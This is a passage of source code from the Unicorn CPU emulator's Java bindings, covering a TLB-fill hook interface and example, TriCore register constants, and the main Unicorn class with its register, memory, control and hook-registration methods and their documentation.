    /** Called to map a virtual address within the registered range to a
     * physical address. The resulting mapping is cached in the QEMU TLB.
     * These hooks are only called if the TLB mode (set via
     * {@link Unicorn#ctl_tlb_mode}) is set to {@code UC_TLB_VIRTUAL}.
     *
     * @param u     {@link Unicorn} instance firing this hook
     * @param vaddr virtual address being mapped
     * @param type  type of memory access ({@code UC_MEM_READ},
     *              {@code UC_MEM_WRITE} or {@code UC_MEM_FETCH}).
     * @param user  user data provided when registering this hook
     * @return      the page-aligned physical address ORed with the page
     *              protection bits ({@code UC_PROT_*}). Return -1L to
     *              indicate an unmapped address; if all hooks return -1L,
     *              the memory access will fail and raise a CPU exception.
     */
    public long hook(Unicorn u, long vaddr, int type, Object user);
}
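/* Illustrative sketch (not from the Unicorn sources): a TlbFillHook that maps
   one high virtual page onto low physical memory. Everything here is an
   assumption for the demo: the hook_add(TlbFillHook, long begin, long end,
   Object user) overload, enabling UC_TLB_VIRTUAL via ctl_tlb_mode before the
   hook is consulted, and mem_map operating on physical addresses in that
   mode. */
import unicorn.*;

public class TlbFillExample {
    public static void main(String[] args) {
        Unicorn uc = new Unicorn(Unicorn.UC_ARCH_X86, Unicorn.UC_MODE_32);
        uc.ctl_tlb_mode(Unicorn.UC_TLB_VIRTUAL);
        byte[] code = { (byte) 0x90, (byte) 0x90 }; // nop ; nop
        // Physical backing page at 0x4000.
        uc.mem_map(0x4000, 0x1000, Unicorn.UC_PROT_ALL);
        uc.mem_write(0x4000, code);
        // Translate accesses to virtual page 0x100000 into that page;
        // report everything else as unmapped.
        TlbFillHook hook = (u, vaddr, type, user) -> {
            if (vaddr >= 0x100000L && vaddr < 0x101000L) {
                return 0x4000L | Unicorn.UC_PROT_ALL;
            }
            return -1L;
        };
        uc.hook_add(hook, 1, 0, null);
        uc.emu_start(0x100000L, 0x100000L + code.length, 0, 0);
        uc.close();
    }
}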
UC_TRICORE_REG_CPR2_L = 64; public static final int UC_TRICORE_REG_CPR3_L = 65; public static final int UC_TRICORE_REG_DPM0 = 66; public static final int UC_TRICORE_REG_DPM1 = 67; public static final int UC_TRICORE_REG_DPM2 = 68; public static final int UC_TRICORE_REG_DPM3 = 69; public static final int UC_TRICORE_REG_CPM0 = 70; public static final int UC_TRICORE_REG_CPM1 = 71; public static final int UC_TRICORE_REG_CPM2 = 72; public static final int UC_TRICORE_REG_CPM3 = 73; public static final int UC_TRICORE_REG_MMU_CON = 74; public static final int UC_TRICORE_REG_MMU_ASI = 75; public static final int UC_TRICORE_REG_MMU_TVA = 76; public static final int UC_TRICORE_REG_MMU_TPA = 77; public static final int UC_TRICORE_REG_MMU_TPX = 78; public static final int UC_TRICORE_REG_MMU_TFA = 79; public static final int UC_TRICORE_REG_BMACON = 80; public static final int UC_TRICORE_REG_SMACON = 81; public static final int UC_TRICORE_REG_DIEAR = 82; public static final int UC_TRICORE_REG_DIETR = 83; public static final int UC_TRICORE_REG_CCDIER = 84; public static final int UC_TRICORE_REG_MIECON = 85; public static final int UC_TRICORE_REG_PIEAR = 86; public static final int UC_TRICORE_REG_PIETR = 87; public static final int UC_TRICORE_REG_CCPIER = 88; public static final int UC_TRICORE_REG_DBGSR = 89; public static final int UC_TRICORE_REG_EXEVT = 90; public static final int UC_TRICORE_REG_CREVT = 91; public static final int UC_TRICORE_REG_SWEVT = 92; public static final int UC_TRICORE_REG_TR0EVT = 93; public static final int UC_TRICORE_REG_TR1EVT = 94; public static final int UC_TRICORE_REG_DMS = 95; public static final int UC_TRICORE_REG_DCX = 96; public static final int UC_TRICORE_REG_DBGTCR = 97; public static final int UC_TRICORE_REG_CCTRL = 98; public static final int UC_TRICORE_REG_CCNT = 99; public static final int UC_TRICORE_REG_ICNT = 100; public static final int UC_TRICORE_REG_M1CNT = 101; public static final int UC_TRICORE_REG_M2CNT = 102; public static final int UC_TRICORE_REG_M3CNT = 103; public static final int UC_TRICORE_REG_ENDING = 104; public static final int UC_TRICORE_REG_GA0 = 1; public static final int UC_TRICORE_REG_GA1 = 2; public static final int UC_TRICORE_REG_GA8 = 9; public static final int UC_TRICORE_REG_GA9 = 10; public static final int UC_TRICORE_REG_SP = 11; public static final int UC_TRICORE_REG_LR = 12; public static final int UC_TRICORE_REG_IA = 16; public static final int UC_TRICORE_REG_ID = 32; } unicorn-2.1.1/bindings/java/src/main/java/unicorn/Unicorn.java000066400000000000000000001552561467524106700243310ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle, 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 
*/ package unicorn; import java.math.BigInteger; import java.nio.Buffer; import java.nio.ByteBuffer; import java.nio.ByteOrder; import java.util.Arrays; import java.util.Hashtable; import java.util.Iterator; import java.util.Map; import java.util.concurrent.atomic.AtomicLong; /** Unicorn is a lightweight multi-platform, multi-architecture CPU emulator framework. */ public class Unicorn implements UnicornConst, Arm64Const, ArmConst, M68kConst, MipsConst, PpcConst, RiscvConst, S390xConst, SparcConst, TriCoreConst, X86Const { private long nativePtr; private int arch; private int mode; private Hashtable<Long, HookWrapper> hooks = new Hashtable<>(); /** Instead of handing out native pointers, we'll hand out a handle * ID for safety. This prevents things like "double frees" - * accidentally releasing an unrelated object via handle reuse. */ private static AtomicLong allocCounter = new AtomicLong(0x1000); private static long nextAllocCounter() { return allocCounter.addAndGet(8); } /** Wrapper around a registered hook */ private static class HookWrapper { Hook hook; long nativePtr; @Override protected void finalize() { _hookwrapper_free(nativePtr); } } public static class Context { long nativePtr; public int arch; public int mode; @Override protected void finalize() { _context_free(nativePtr); } /** * Read register value from saved context. * * @param regid Register ID that is to be retrieved. This function only supports * integer registers at most 64 bits long. * @return value of the register. * @see Unicorn#reg_read(int) */ public long reg_read(int regid) throws UnicornException { return do_reg_read_long(nativePtr, 1, arch, regid); } /** * Read register value from saved context. * * @param regid Register ID that is to be retrieved. * @param opt Options for this register, or null if no options are required. * @return value of the register - Long, BigInteger, or structure. * @see Unicorn#reg_read(int, Object) */ public Object reg_read(int regid, Object opt) throws UnicornException { return do_reg_read_obj(nativePtr, 1, arch, regid, opt); } /** * Write to register in saved context. * * @param regid Register ID that is to be modified. * @param value The new register value. * @see Unicorn#reg_write(int, long) */ public void reg_write(int regid, long value) throws UnicornException { do_reg_write_long(nativePtr, 1, arch, regid, value); } /** * Write to register in saved context. * * @param regid Register ID that is to be modified. * @param value Object containing the new register value. * @see Unicorn#reg_write(int, Object) */ public void reg_write(int regid, Object value) throws UnicornException { do_reg_write_obj(nativePtr, 1, arch, regid, value); } } static { // load libunicorn_java.{so,dylib} or unicorn_java.dll System.loadLibrary("unicorn_java"); } /** * Create a new Unicorn object * * @param arch Architecture type. One of the {@code UC_ARCH_*} constants. * @param mode Hardware mode. Bitwise combination of {@code UC_MODE_*} constants. * @see UnicornConst * */ public Unicorn(int arch, int mode) throws UnicornException { // remember these in case we need arch specific code this.arch = arch; this.mode = mode; nativePtr = _open(arch, mode); } /** * Close the C {@code uc_engine} associated with this Unicorn object, * freeing all associated resources. After calling this method, the * API will no longer be usable. */ public void close() throws UnicornException { if (nativePtr != 0) { _close(nativePtr); nativePtr = 0; } } /** * Automatically close the {@code uc_engine} upon GC finalization. 
*/ @Override protected void finalize() { close(); } /** * Return combined API version & major and minor version numbers. * * @return version number as {@code (major << 24 | minor << 16 | * patch << 8 | extra)}. * For example, Unicorn version 2.0.1 final would be 0x020001ff. */ public static int version() { return _version(); } /** * Determine if the given architecture is supported by this library. * * @param arch Architecture type ({@code UC_ARCH_*} constant) * @return {@code true} if this library supports the given arch. * @see UnicornConst */ public static boolean arch_supported(int arch) { return _arch_supported(arch); } /** * Emulate machine code for a specific length of time or number of * instructions. * * @param begin Address where emulation starts * @param until Address where emulation stops (i.e. when this address is hit) * @param timeout Duration to emulate the code for, in microseconds, or 0 to * run indefinitely. * @param count The maximum number of instructions to execute, or 0 to * execute indefinitely. * @throws UnicornException if an unhandled CPU exception or other error * occurs during emulation. */ public void emu_start(long begin, long until, long timeout, long count) throws UnicornException { _emu_start(nativePtr, begin, until, timeout, count); } /** * Stop emulation (which was started by {@link #emu_start()}). * * This can be called from hook callbacks or from a separate thread. * NOTE: for now, this will stop the execution only after the current * basic block. */ public void emu_stop() throws UnicornException { _emu_stop(nativePtr); } private static boolean is_long_register(int arch, int regid) { switch (arch) { case UC_ARCH_X86: return !(regid == UC_X86_REG_IDTR || regid == UC_X86_REG_GDTR || regid == UC_X86_REG_LDTR || regid == UC_X86_REG_TR || (regid >= UC_X86_REG_FP0 && regid <= UC_X86_REG_FP7) || (regid >= UC_X86_REG_ST0 && regid <= UC_X86_REG_ST7) || (regid >= UC_X86_REG_XMM0 && regid <= UC_X86_REG_XMM31) || (regid >= UC_X86_REG_YMM0 && regid <= UC_X86_REG_YMM31) || (regid >= UC_X86_REG_ZMM0 && regid <= UC_X86_REG_ZMM31) || regid == UC_X86_REG_MSR); case UC_ARCH_ARM: return !(regid == UC_ARM_REG_CP_REG); case UC_ARCH_ARM64: return !(regid == UC_ARM64_REG_CP_REG || (regid >= UC_ARM64_REG_Q0 && regid <= UC_ARM64_REG_Q31) || (regid >= UC_ARM64_REG_V0 && regid <= UC_ARM64_REG_V31)); } return true; } private static long do_reg_read_long(long ptr, int isContext, int arch, int regid) throws UnicornException { if (is_long_register(arch, regid)) { return _reg_read_long(ptr, isContext, regid); } else { throw new UnicornException("Invalid register for reg_read_long"); } } private static Object do_reg_read_obj(long ptr, int isContext, int arch, int regid, Object opt) throws UnicornException { switch (arch) { case UC_ARCH_X86: if (regid == UC_X86_REG_IDTR || regid == UC_X86_REG_GDTR || regid == UC_X86_REG_LDTR || regid == UC_X86_REG_TR) { return _reg_read_x86_mmr(ptr, isContext, regid); } else if ((regid >= UC_X86_REG_FP0 && regid <= UC_X86_REG_FP7) || (regid >= UC_X86_REG_ST0 && regid <= UC_X86_REG_ST7)) { ByteBuffer b = ByteBuffer.allocate(16).order(ByteOrder.LITTLE_ENDIAN); _reg_read_bytes(ptr, isContext, regid, b.array()); return new X86_Float80(b.getLong(0), b.getShort(8)); } else if (regid >= UC_X86_REG_XMM0 && regid <= UC_X86_REG_XMM31) { return do_reg_read_bigint(ptr, isContext, regid, 128); } else if (regid >= UC_X86_REG_YMM0 && regid <= UC_X86_REG_YMM31) { return do_reg_read_bigint(ptr, isContext, regid, 256); } else if (regid >= UC_X86_REG_ZMM0 && regid <= 
UC_X86_REG_ZMM31) { return do_reg_read_bigint(ptr, isContext, regid, 512); } else if (regid == UC_X86_REG_MSR) { X86_MSR reg = (X86_MSR) opt; return (Long) _reg_read_x86_msr(ptr, isContext, reg.rid); } break; case UC_ARCH_ARM: if (regid == UC_ARM_REG_CP_REG) { Arm_CP reg = (Arm_CP) opt; return (Long) _reg_read_arm_cp(ptr, isContext, reg.cp, reg.is64, reg.sec, reg.crn, reg.crm, reg.opc1, reg.opc2); } break; case UC_ARCH_ARM64: if (regid == UC_ARM64_REG_CP_REG) { Arm64_CP reg = (Arm64_CP) opt; return (Long) _reg_read_arm64_cp(ptr, isContext, reg.crn, reg.crm, reg.op0, reg.op1, reg.op2); } else if ((regid >= UC_ARM64_REG_Q0 && regid <= UC_ARM64_REG_Q31) || (regid >= UC_ARM64_REG_V0 && regid <= UC_ARM64_REG_V31)) { return do_reg_read_bigint(ptr, isContext, regid, 128); } break; } return _reg_read_long(ptr, isContext, regid); } private static void do_reg_write_long(long ptr, int isContext, int arch, int regid, long value) throws UnicornException { if (is_long_register(arch, regid)) { _reg_write_long(ptr, isContext, regid, value); } else { throw new UnicornException("Invalid register for reg_write_long"); } } private static void do_reg_write_obj(long ptr, int isContext, int arch, int regid, Object value) throws UnicornException { switch (arch) { case UC_ARCH_X86: if (regid == UC_X86_REG_IDTR || regid == UC_X86_REG_GDTR || regid == UC_X86_REG_LDTR || regid == UC_X86_REG_TR) { X86_MMR reg = (X86_MMR) value; _reg_write_x86_mmr(ptr, isContext, regid, reg.selector, reg.base, reg.limit, reg.flags); return; } else if ((regid >= UC_X86_REG_FP0 && regid <= UC_X86_REG_FP7) || (regid >= UC_X86_REG_ST0 && regid <= UC_X86_REG_ST7)) { X86_Float80 reg = (X86_Float80) value; ByteBuffer b = ByteBuffer.allocate(16).order(ByteOrder.LITTLE_ENDIAN); b.putLong(0, reg.mantissa); b.putShort(8, reg.exponent); _reg_write_bytes(ptr, isContext, regid, b.array()); return; } else if (regid >= UC_X86_REG_XMM0 && regid <= UC_X86_REG_XMM31) { do_reg_write_bigint(ptr, isContext, regid, (BigInteger) value, 128); return; } else if (regid >= UC_X86_REG_YMM0 && regid <= UC_X86_REG_YMM31) { do_reg_write_bigint(ptr, isContext, regid, (BigInteger) value, 256); return; } else if (regid >= UC_X86_REG_ZMM0 && regid <= UC_X86_REG_ZMM31) { do_reg_write_bigint(ptr, isContext, regid, (BigInteger) value, 512); return; } else if (regid == UC_X86_REG_MSR) { X86_MSR reg = (X86_MSR) value; _reg_write_x86_msr(ptr, isContext, reg.rid, reg.value); return; } break; case UC_ARCH_ARM: if (regid == UC_ARM_REG_CP_REG) { Arm_CP reg = (Arm_CP) value; _reg_write_arm_cp(ptr, isContext, reg.cp, reg.is64, reg.sec, reg.crn, reg.crm, reg.opc1, reg.opc2, reg.val); return; } break; case UC_ARCH_ARM64: if (regid == UC_ARM64_REG_CP_REG) { Arm64_CP reg = (Arm64_CP) value; _reg_write_arm64_cp(ptr, isContext, reg.crn, reg.crm, reg.op0, reg.op1, reg.op2, reg.val); return; } else if ((regid >= UC_ARM64_REG_Q0 && regid <= UC_ARM64_REG_Q31) || (regid >= UC_ARM64_REG_V0 && regid <= UC_ARM64_REG_V31)) { do_reg_write_bigint(ptr, isContext, regid, (BigInteger) value, 128); return; } break; } _reg_write_long(ptr, isContext, regid, (Long) value); } private static BigInteger do_reg_read_bigint(long ptr, int isContext, int regid, int nbits) { byte[] buf = new byte[nbits >> 3]; _reg_read_bytes(ptr, isContext, regid, buf); if (ByteOrder.nativeOrder().equals(ByteOrder.LITTLE_ENDIAN)) { // reverse native buffer to big-endian on little-endian hosts int i = buf.length - 1; int j = 0; while (i > j) { byte temp = buf[i]; buf[i] = buf[j]; buf[j] = temp; i--; j++; } } return new BigInteger(1, 
buf); } private static void do_reg_write_bigint(long ptr, int isContext, int regid, BigInteger value, int nbits) { byte[] val = value.toByteArray(); byte[] buf = new byte[nbits >> 3]; if (val.length == ((nbits >> 3) + 1) && val[0] == 0x00) { // unsigned value >= 2^(nbits - 1): has a zero sign bit val = Arrays.copyOfRange(val, 1, val.length); } else if (val[0] < 0) { Arrays.fill(buf, (byte) 0xff); } if (val.length > (nbits >> 3)) { throw new IllegalArgumentException( "input integer is too large for a " + nbits + "-bit register (got " + (value.bitLength() + 1) + " bits)"); } if (ByteOrder.nativeOrder().equals(ByteOrder.LITTLE_ENDIAN)) { for (int i = 0; i < val.length; i++) { buf[i] = val[val.length - i - 1]; } } else { System.arraycopy(val, 0, buf, buf.length - val.length, val.length); } _reg_write_bytes(ptr, isContext, regid, buf); } /** * Read register value of at most 64 bits in size. * * @param regid Register ID that is to be retrieved. This function only supports * integer registers at most 64 bits long. * @return value of the register. * @see {@link #reg_read(int, Object)} to read larger registers or * registers requiring configuration. * @throws UnicornException if the register is not valid for the current * architecture or mode. */ public long reg_read(int regid) throws UnicornException { return do_reg_read_long(nativePtr, 0, arch, regid); } /** * Read register value. The return type depends on {@code regid} as * follows. {@code opt} should be {@code null} unless otherwise specified. *
* <ul>
* <li>{@code UC_X86_REG_*TR} => {@link X86_MMR}
* <li>{@code UC_X86_REG_FP*} => {@link X86_Float80}
* <li>{@code UC_X86_REG_ST*} => {@link X86_Float80}
* <li>{@code UC_X86_REG_XMM*} => {@link BigInteger} (128 bits)
* <li>{@code UC_X86_REG_YMM*} => {@link BigInteger} (256 bits)
* <li>{@code UC_X86_REG_ZMM*} => {@link BigInteger} (512 bits)
* <li>{@code UC_X86_REG_MSR} (opt: {@link X86_MSR}) => {@link Long}
* <li>{@code UC_ARM_REG_CP} (opt: {@link Arm_CP}) => {@link Long}
* <li>{@code UC_ARM64_REG_CP} (opt: {@link Arm64_CP}) => {@link Long}
* <li>{@code UC_ARM64_REG_Q*} => {@link BigInteger} (128 bits)
* <li>{@code UC_ARM64_REG_V*} => {@link BigInteger} (128 bits)
* </ul>
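* <p>Illustrative sketch (not part of the original javadoc): reading a
* 128-bit XMM register as an unsigned value, where {@code uc} is assumed
* to be a {@code UC_ARCH_X86} Unicorn instance.
* <pre>{@code
* BigInteger xmm0 = (BigInteger) uc.reg_read(Unicorn.UC_X86_REG_XMM0, null);
* }</pre>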
* * {@link BigInteger} registers always produce non-negative results (i.e. * they read as unsigned integers). * * @param regid Register ID that is to be retrieved. * @param opt Options for this register, or {@code null} if no options * are required. * @return value of the register - {@link Long}, {@link BigInteger}, * or other class. * @throws UnicornException if the register is not valid for the current * architecture or mode. */ public Object reg_read(int regid, Object opt) throws UnicornException { return do_reg_read_obj(nativePtr, 0, arch, regid, opt); } /** * Write to register. This sets any register that doesn't require special * options and which is at most 64 bits long. * * @param regid Register ID that is to be modified. * @param value The new register value. * @see {@link #reg_write(int, Object)} to write larger registers or * registers requiring configuration. * @throws UnicornException if the register is not valid for the current * architecture or mode. */ public void reg_write(int regid, long value) throws UnicornException { do_reg_write_long(nativePtr, 0, arch, regid, value); } /** * Write to register. The type of {@code value} depends on {@code regid}: *
* <ul>
* <li>{@code UC_X86_REG_*TR} => {@link X86_MMR}
* <li>{@code UC_X86_REG_FP*} => {@link X86_Float80}
* <li>{@code UC_X86_REG_ST*} => {@link X86_Float80}
* <li>{@code UC_X86_REG_XMM*} => {@link BigInteger} (128 bits)
* <li>{@code UC_X86_REG_YMM*} => {@link BigInteger} (256 bits)
* <li>{@code UC_X86_REG_ZMM*} => {@link BigInteger} (512 bits)
* <li>{@code UC_X86_REG_MSR} => {@link X86_MSR}
* <li>{@code UC_ARM_REG_CP} => {@link Arm_CP}
* <li>{@code UC_ARM64_REG_CP} => {@link Arm64_CP}
* <li>{@code UC_ARM64_REG_Q*} => {@link BigInteger} (128 bits)
* <li>{@code UC_ARM64_REG_V*} => {@link BigInteger} (128 bits)
* </ul>
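* <p>Illustrative sketch (not part of the original javadoc): writing a
* 128-bit value to an XMM register, where {@code uc} is assumed to be a
* {@code UC_ARCH_X86} Unicorn instance.
* <pre>{@code
* uc.reg_write(Unicorn.UC_X86_REG_XMM0, BigInteger.ONE.shiftLeft(127));
* }</pre>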
* * {@link BigInteger} values can be signed or unsigned, as long as the * value fits in the target register size. Values that are too large will * be rejected. * * @param regid Register ID that is to be modified. * @param value Object containing the new register value. * @throws UnicornException if the register is not valid for the current * architecture or mode. */ public void reg_write(int regid, Object value) throws UnicornException { do_reg_write_obj(nativePtr, 0, arch, regid, value); } /** @deprecated Use individual calls to {@code reg_read} instead. * This method is deprecated as it is much slower than * {@link #reg_read(int)} for reading 64-bit-or-smaller registers. */ @Deprecated public Object[] reg_read_batch(int regids[]) throws UnicornException { Object[] res = new Object[regids.length]; for (int i = 0; i < regids.length; i++) { res[i] = reg_read(regids[i], null); } return res; } /** @deprecated Use individual calls to {@code reg_write} instead. * This method is deprecated as it is much slower than * {@link #reg_write(int, long)} for writing 64-bit-or-smaller registers. */ @Deprecated public void reg_write_batch(int regids[], Object vals[]) throws UnicornException { if (regids.length != vals.length) { throw new UnicornException(strerror(UC_ERR_ARG)); } for (int i = 0; i < regids.length; i++) { reg_write(regids[i], vals[i]); } } /** * Read from memory. * * @param address Start address of the memory region to be read. * @param size Number of bytes to be retrieved. * @return Byte array containing the contents of the requested memory range. */ public byte[] mem_read(long address, int size) throws UnicornException { byte[] result = new byte[size]; _mem_read(nativePtr, address, result); return result; } /** @deprecated Use {@link #mem_read(long, int)} instead. */ @Deprecated public byte[] mem_read(long address, long size) throws UnicornException { if (size < 0) { throw new NegativeArraySizeException("size cannot be negative"); } else if (size > Integer.MAX_VALUE) { throw new IllegalArgumentException("size must fit in an int"); } byte[] result = new byte[(int) size]; _mem_read(nativePtr, address, result); return result; } /** * Write to memory. * * @param address Start address of the memory region to be written. * @param bytes The values to be written into memory. {@code bytes.length} * bytes will be written. */ public void mem_write(long address, byte[] bytes) throws UnicornException { _mem_write(nativePtr, address, bytes); } /** * Query the internal status of the engine. * * @param type query type, one of the {@code UC_QUERY_*} constants. * @return result of the query * @see UnicornConst */ public long query(int type) throws UnicornException { return _query(nativePtr, type); } /** * Report the last error number when some API functions fail. * {@code errno} may not retain its old value once accessed. * * @return Error code, one of the {@code UC_ERR_*} constants. * @deprecated Not actually useful in Java; error numbers are always * converted into {@link UnicornException} exceptions. * @see UnicornConst */ @Deprecated public int errno() { return _errno(nativePtr); } /** * Return a string describing the given error code. * * @param code Error code, one of the {@code UC_ERR_*} constants. * @return a String that describes the error code * @see UnicornConst */ public static String strerror(int code) { return _strerror(code); } /** * Get the current emulation mode. * * @return a bitwise OR of {@code UC_MODE_*} constants. 
*/ public int ctl_get_mode() throws UnicornException { return _ctl_get_mode(nativePtr); } /** * Get the current emulation architecture. * * @return a {@code UC_ARCH_*} constant. */ public int ctl_get_arch() throws UnicornException { return _ctl_get_arch(nativePtr); } /** Get the current execution timeout, in nanoseconds. */ public long ctl_get_timeout() throws UnicornException { return _ctl_get_timeout(nativePtr); } /** Get the current page size, in bytes. */ public int ctl_get_page_size() throws UnicornException { return _ctl_get_page_size(nativePtr); } /** Set the current page size, in bytes. * * @param page_size Requested page size. Must be a power of two. * @throws UnicornException if the architecture does not support setting * the page size. */ public void ctl_set_page_size(int page_size) throws UnicornException { _ctl_set_page_size(nativePtr, page_size); } /** Enable or disable multiple exit support. * * Exits provide a more flexible way to terminate execution, versus using * the {@code until} parameter to {@link #emu_start}. When exits are * enabled, execution will stop at any of the configured exit addresses, * and the {@code until} parameter will be ignored. */ public void ctl_exits_enabled(boolean value) throws UnicornException { _ctl_set_use_exits(nativePtr, value); } /** Get the current number of active exits. * * @return The number of exit addresses currently configured * @throws UnicornException if exits are not enabled */ public long ctl_get_exits_cnt() throws UnicornException { return _ctl_get_exits_cnt(nativePtr); } /** Get the current active exits. * * @return An array of active exit addresses. * @throws UnicornException if exits are not enabled */ public long[] ctl_get_exits() throws UnicornException { return _ctl_get_exits(nativePtr); } /** Set the active exit addresses. * * @param exits An array of exit addresses to use. * @throws UnicornException if exits are not enabled */ public void ctl_set_exits(long[] exits) throws UnicornException { _ctl_set_exits(nativePtr, exits); } /** Get the emulated CPU model. * * @return One of the {@code UC_CPU_<ARCH>_*} constants. See the * appropriate Const class for a list of valid constants. */ public int ctl_get_cpu_model() throws UnicornException { return _ctl_get_cpu_model(nativePtr); } /** Set the emulated CPU model. Note that this option can only be called * immediately after constructing the Unicorn object, before any other APIs * are called. * * @param cpu_model One of the {@code UC_CPU_<ARCH>_*} constants. See the * appropriate Const class for a list of valid constants. */ public void ctl_set_cpu_model(int cpu_model) throws UnicornException { _ctl_set_cpu_model(nativePtr, cpu_model); } /** Request the TB cache at a specific address. */ public TranslationBlock ctl_request_cache(long address) throws UnicornException { return _ctl_request_cache(nativePtr, address); } /** Invalidate the TB cache for a specific range of addresses * {@code [address, end)}. Note that invalidation will not include address * {@code end} itself. * * @param address The first address in the region to invalidate * @param end The last address in the region to invalidate, plus one */ public void ctl_remove_cache(long address, long end) throws UnicornException { _ctl_remove_cache(nativePtr, address, end); } /** Flush the entire TB cache, invalidating all translation blocks. */ public void ctl_flush_tb() throws UnicornException { _ctl_flush_tb(nativePtr); } /** Flush the TLB cache, invalidating all TLB cache entries and * translation blocks. 
*/ public void ctl_flush_tlb() throws UnicornException { _ctl_flush_tlb(nativePtr); } /** Change the TLB implementation. * * @param mode One of the {@code UC_TLB_*} constants. * @see UnicornConst */ public void ctl_tlb_mode(int mode) throws UnicornException { _ctl_tlb_mode(nativePtr, mode); } private long registerHook(Hook hook, long val) { HookWrapper wrapper = new HookWrapper(); wrapper.hook = hook; wrapper.nativePtr = val; long index = nextAllocCounter(); hooks.put(index, wrapper); return index; } /** * Register a {@code UC_HOOK_INTR} hook. The hook function will be invoked * whenever a CPU interrupt occurs. * * @param callback Implementation of a {@link InterruptHook} interface * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(InterruptHook callback, Object user_data) throws UnicornException { return registerHook(callback, _hook_add(nativePtr, UC_HOOK_INTR, callback, user_data, 1, 0)); } /** * Register a {@code UC_HOOK_INSN} hook. The hook function will be * invoked whenever the matching special instruction is executed. * The exact interface called will depend on the instruction being hooked. * * @param callback Implementation of an {@link InstructionHook} sub-interface * @param insn {@code UC_<ARCH>_INS_<INSN>} constant, e.g. * {@code UC_X86_INS_IN} or {@code UC_ARM64_INS_MRS} * @param begin Start address of hooking range * @param end End address of hooking range * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(InstructionHook callback, int insn, long begin, long end, Object user_data) throws UnicornException { return registerHook(callback, _hook_add(nativePtr, UC_HOOK_INSN, callback, user_data, begin, end, insn)); } /** * Register a {@code UC_HOOK_INSN} hook for all program addresses. * The exact interface called will depend on the instruction being hooked. * * @param callback Implementation of an {@link InstructionHook} * sub-interface * @param insn {@code UC_<ARCH>_INS_<INSN>} constant, e.g. * {@code UC_X86_INS_IN} or {@code UC_ARM64_INS_MRS} * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(InstructionHook callback, int insn, Object user_data) throws UnicornException { return hook_add(callback, insn, 1, 0, user_data); } /** * Register a hook for the X86 IN instruction. * The registered callback will be called whenever an IN instruction * is executed. * * @param callback Object implementing the {@link InHook} interface * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(InHook callback, Object user_data) throws UnicornException { return hook_add(callback, UC_X86_INS_IN, user_data); } /** * Register a hook for the X86 OUT instruction. * The registered callback will be called whenever an OUT instruction * is executed. 
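* <p>Illustrative sketch (not part of the original javadoc; the
* {@link OutHook} callback parameter list shown here is an assumption,
* mirroring the C OUT-instruction callback, and is not documented above):
* <pre>{@code
* uc.hook_add((OutHook) (u, port, size, value, user) ->
*     System.out.printf("OUT port=0x%x value=0x%x%n", port, value), null);
* }</pre>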
* * @param callback Object implementing the {@link OutHook} interface * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(OutHook callback, Object user_data) throws UnicornException { return hook_add(callback, UC_X86_INS_OUT, user_data); } /** @deprecated Use {@code hook_add(callback, UC_X86_INS_SYSCALL, begin, * end, user_data)} or {@code hook_add(callback, * UC_X86_INS_SYSENTER, begin, end, user_data)} instead. */ @Deprecated public long hook_add(SyscallHook callback, Object user_data) throws UnicornException { // Old implementation only registered SYSCALL, not SYSENTER. // Since this is deprecated anyway, we retain the old behaviour. return hook_add(callback, UC_X86_INS_SYSCALL, user_data); } /** * Register a {@code UC_HOOK_CODE} hook. The hook function will be * invoked when an instruction is executed from the address range * begin <= PC <= end. For the special case in which begin > end, the * callback will be invoked for ALL instructions. * * @param callback Implementation of a {@link CodeHook} interface * @param begin Start address of hooking range * @param end End address of hooking range * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(CodeHook callback, long begin, long end, Object user_data) throws UnicornException { return registerHook(callback, _hook_add(nativePtr, UC_HOOK_CODE, callback, user_data, begin, end)); } /** * Register a {@code UC_HOOK_BLOCK} hook. The hook function will be * invoked when a basic block is entered and the address of the basic * block (BB) falls in the range begin <= BB <= end. For the special case * in which begin > end, the callback will be invoked whenever any basic * block is entered. * * @param callback Implementation of a {@link BlockHook} interface * @param begin Start address of hooking range * @param end End address of hooking range * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(BlockHook callback, long begin, long end, Object user_data) throws UnicornException { return registerHook(callback, _hook_add(nativePtr, UC_HOOK_BLOCK, callback, user_data, begin, end)); } /** * Register a {@code UC_HOOK_MEM_VALID} hook * ({@code UC_HOOK_MEM_[READ,WRITE,FETCH]} and/or * {@code UC_HOOK_MEM_READ_AFTER}). The registered callback function will * be invoked whenever a corresponding memory operation is performed * within the address range begin <= addr <= end. For the special case in * which begin > end, the callback will be invoked for ALL memory * operations. 
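* <p>Illustrative sketch (not part of the original javadoc; the
* {@link MemHook} callback parameter list shown here is an assumption,
* not documented above). Passing begin=1, end=0 hooks all addresses:
* <pre>{@code
* long h = uc.hook_add((MemHook) (u, type, address, size, value, user) ->
*     System.out.printf("mem event %d at 0x%x (%d bytes)%n", type, address, size),
*     Unicorn.UC_HOOK_MEM_READ | Unicorn.UC_HOOK_MEM_WRITE, 1, 0, null);
* }</pre>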
